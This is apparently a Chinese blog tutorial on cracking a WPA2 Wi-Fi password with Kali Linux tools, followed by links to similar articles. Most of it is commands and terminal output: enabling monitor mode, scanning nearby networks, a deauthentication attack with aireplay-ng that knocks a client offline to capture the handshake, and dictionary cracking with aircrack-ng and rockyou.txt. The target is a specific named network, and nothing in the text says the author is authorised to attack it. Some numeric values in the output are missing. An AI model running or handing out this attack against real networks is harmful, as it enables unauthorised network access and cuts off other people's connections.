1.查看网卡名称:iwconfig

有一块 名为wlan0 的无线网卡通过一下命令排除影响因素

root@jkali:~# iwconfig

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:"jlysltqx"

          Mode:Managed  Frequency:2.462 GHz  Access Point: :6C::0A:CE:7D

          Bit Rate=144.4 Mb/s   Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:on

          Link Quality=/  Signal level=- dBm

          Rx invalid nwid:  Rx invalid crypt:  Rx invalid frag:

          Tx excessive retries:  Invalid misc:   Missed beacon:

2.通过一下命令排除影响因素

root@jkali:~# service network-manager stop

root@jkali:~# airmon-ng check kill

Killing these processes:

  PID Name

  wpa_supplicant

3.启动monitor 模式

root@jkali:~# airmon-ng start wlan0

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

        (mac80211 station mode vif disabled for [phy0]wlan0)

4.查看是否进入了监控模式

root@jkali:~# iwconfig

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Power Management:on

lo        no wireless extensions.

5.进行抓包

root@jkali:~# airodump-ng wlan0mon

 CH   ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 0C:4B::0A:0A:B5   -                         -   WPA              <length:  >

 :6C::0A:CE:7D  -                         WPA2 CCMP   PSK  jlysltqx

 0C:6A:BC::AB:ED  -                         WPA2 CCMP   PSK  ChinaNet-fG5b

 :::C6::0C  -                          WPA2 CCMP   PSK  ChinaNet-sWTz

 E0:::7F::  -                           WPA2 CCMP   PSK  ChinaNet-SrPw

 :1D::3B::E8  -                          WPA2 CCMP   PSK  CMCC-er99

 8E:::C9::EB  -                          WPA2 CCMP   PSK  Guest_53EB

 :::C9::EB  -                          WPA2 CCMP   PSK  Master

 BC:D1::BD:F1:  -                           WPA2 CCMP   PSK  ¬����      

我们来抓jlysltqx,他的bssid为::6C::0A:CE:7D,ch 为 ,加密方式为wpa2

6.只抓我们要的wifi 的包

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa

 CH  ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                    WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e

 :6C::0A:CE:7D  :3E::2A::6A  -     -

7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息

aireplay-ng -  -a :6C::0A:CE:7D -c 3C:B6:B7:E0:4C: wlan0mon

8.重新执行6获取握手信息

root@jkali:~/kk# airodump-ng wlan0mon --bssid :6C::0A:CE:7D -c  -w wpa

 CH  ][ Elapsed:  min ][ -- : ][ WPA handshake: :6C::0A:CE:7D                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                        WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e         jlysltqx

 :6C::0A:CE:7D  :3E::2A::6A  -     -

9.查看抓到的包 wpa-04.cap 就是我们抓成功的包

root@jkali:~/kk# ls -lrt

总用量

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root      1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root     1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root  1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root   1月   : wpa-.cap

10.利用字典来进行解密(若字典文件未解压,请自行解压)

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-.cap

11.破解完成后恢复网络

root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon    iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 station mode vif enabled on [phy0]wlan0)

        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

kali 破解wifi的更多相关文章

  1. 利用kali破解wifi密码

    准备工具 1.笔记本 2.USB无线上网卡(必备) 3.kali系统 4.密码字典 第一种方法 暴力破解法 何为暴力破解呢,其实就是一个一个密码去试,直到正确的密码. 现在的wifi一般加密都是: 1 ...

  2. kali破解wifi密码

    开始 1.选择合适的网卡,有些网卡kali识别不了,我用的网卡信息 2.网卡开启监听模式 3.查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功) 4.输入“airodump-ng ...

  3. Kali Linux下破解WIFI密码挂载usb无线网卡的方法

    Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还 ...

  4. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  5. Kali Linux破解wifi密码(无须外置网卡)

    环境准备:  方式一(选择该方式):Kali Linux.笔记本一台.U盘(至少8G)  方式二:Kali Linux.外置网卡.笔记本一台.VM   特别说明,主要是使用方式一进行破解,如果有外置网 ...

  6. 运用Fluxion高效破解WiFi密码

    Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多有趣的功能.目前这个工具在Kali Linux上可以完美运行. 工作原理 1.扫描能够接收到 ...

  7. 破解Wifi

    牛刀小试:Wifi破解的原理. 准备工具:   1:Kali Linux系统 2:一块好用的无线网卡 (推荐免驱版,网上也有推荐,可以去百度上google一下) 3:WPA字典(用来爆破抓获的握手包) ...

  8. 【无线安全实践入门】破解WiFi密码的多个方法

    本文希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操作或错误理解,望大家不吝指正. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的 ...

  9. 破解WIFI教程

    今日主题:如何破解WIFI 准备工具 笔记本一台 usb无线网卡[我用的是小米的] kali系统[可以在虚拟机里装,建议用2019年及以下版本] VMware Workstation15虚拟机安装 可 ...

随机推荐

  1. .net core ajax使用EPPlus上传excle导入总结

    前端 <form class="layui-form" id="div_imp" style="display:none;"> ...

  2. SpringBoot自动装配原理解析

    本文包含:SpringBoot的自动配置原理及如何自定义SpringBootStar等 我们知道,在使用SpringBoot的时候,我们只需要如下方式即可直接启动一个Web程序: @SpringBoo ...

  3. Spring Cloud微服务架构升级总结

    ↵ [编者的话]微服务的概念源于 2014 年 3 月 Martin Fowler 所写的一篇文章“Microservices”.文中内容提到:微服务架构是一种架构模式,它提倡将单一应用程序划分成一组 ...

  4. java 手写 jvm高性能缓存

    java 手写 jvm高性能缓存,键值对存储,队列存储,存储超时设置 缓存接口 package com.ws.commons.cache; import java.util.function.Func ...

  5. EF自动创建数据库步骤之一(实体类写法)

    文章演示使用EF自动创建数据库第一个步骤创建实体类. 一.创建表映射实体类 using System; using System.Collections.Generic; using System.C ...

  6. Date工具类

    总结了下项目中常用的时间转化方法,目前就这么点啦,以后再慢慢添加,先储备起来,免得丢啦. package com.example.keranbin.testdemo; import android.u ...

  7. 完整的房间类游戏解决方案AiJ

    介绍 AiJ是一套完整的房间类游戏解决方案,支持无限水平扩展来满足更大的人数承载,并且提供了良好的调试接口. 主要模块包括: 注册中心 大厅服务 游戏服务 亲友圈服务 运营管理系统 CocosCrea ...

  8. 分布式session的解决方案

    1.Nginx的ip_hash,对应tomcat的session,由tomcat保存 缺点:一旦tomcat单点挂机,session消失 2.session在tomcat之间复制, 缺点:保存全局se ...

  9. thinkphp5 + barcode 生成条形码

    1.去官网下载类库 “https://www.barcodebakery.com/en/download”,选择自己的版本下载 2.解压放到“E:\phpstudy\PHPTutorial\WWW\g ...

  10. Java中基本数据类型、不能用浮点数表示金额

    转载请注明原文地址:https://www.cnblogs.com/ygj0930/p/10831763.html 一:8种基本数据类型 8种基本数据类型(4整,2浮,1符,1布): 整型:byte( ...